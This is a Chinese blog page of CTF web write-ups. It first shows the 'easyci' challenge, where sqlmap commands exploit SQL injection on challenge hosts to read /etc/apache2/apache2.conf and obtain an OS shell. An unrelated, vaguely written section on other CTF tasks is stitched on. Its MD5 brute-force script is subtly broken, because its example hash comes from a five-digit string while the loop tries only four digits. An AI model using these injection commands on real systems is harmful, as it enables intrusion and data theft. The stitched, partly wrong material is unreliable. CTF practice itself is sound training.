纵横杯CTF部分WEB题解

easyci

一道SQL注入题,大概思路:sql注入写入shell,读取flag文件。
sqlmap先读取"/etc/apache2/apache2.conf"内容。

sqlmap -u http://eci-2ze0xe7juyhmgubdhea1.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --threads=10 --file-read="/etc/apache2/apache2.conf"

在这里插入图片描述

发现绝对路径(/var/sercet/html)再写入shell

sqlmap -u http://eci-2ze3qpk9e6qoggl1cuol.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --os-shell

ezcms

参考文章:
YZMCMS V5.3后台 SSRF
Bug #76857 Can read “non-existant” files

### 青少年CTF练习平台Web挑战题解和教程 #### Web EasyMD5 解析 在青少年CTF擂台挑战2024 round#1中,有一道名为EasyMD5的题目。这道题目的设计非常适合初学者尝试解决,尽管它要求参与者具备一定的web安全基础知识以及创新思维能力[^1]。 对于此题的具体解法如下: ```python import hashlib def solve_easy_md5(given_hash): # 假设给定的是md5哈希值 for i in range(10000): # 尝试暴力破解四位数以内的情况 test_str = str(i).zfill(4) if hashlib.md5(test_str.encode()).hexdigest() == given_hash: return test_str raise ValueError("No solution found") # 使用方法 (假设已知hash为'827ccb0eea8a706c4c34a16891f84e7b') print(solve_easy_md5('827ccb0eea8a706c4c34a16891f84e7b')) ``` 这段Python脚本展示了如何通过枚举可能的输入来找到与给出散列匹配的结果字符串。当然,在实际比中还需要考虑更多细节和技术手段去优化效率或处理更复杂的情形。 #### 处理靶机Flash Error的问题 当遇到某些特定条件下会出现页面刷新并显示错误提示的现象时,可以采用Burp Suite这样的工具来进行中间人攻击测试。具体来说就是利用BP抓取请求数据包之后修改其中的内容再发送回去完成答题过程。这种方法虽然相对较为复杂些,但对于熟悉网络协议分析的人来说并不困难,并且能够有效规避因服务器端配置不当所引起的异常情况[^2]。 #### Emoji表情包编码解析 在一个关于Crypto分类下的easy级别题目里提到过一种有趣的加密方式——使用emoji作为字符集进行BaseN变换后再经过其他形式的编码转换最终形成flag。这里的关键在于识别出正确的编/解码路径从而还原原始信息。例如先将看到的一系列图标按照某种规则映射成ASCII码或其他常见字符集合成员;接着可能是多次迭代不同的编码算法直到获得可读文本为止[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值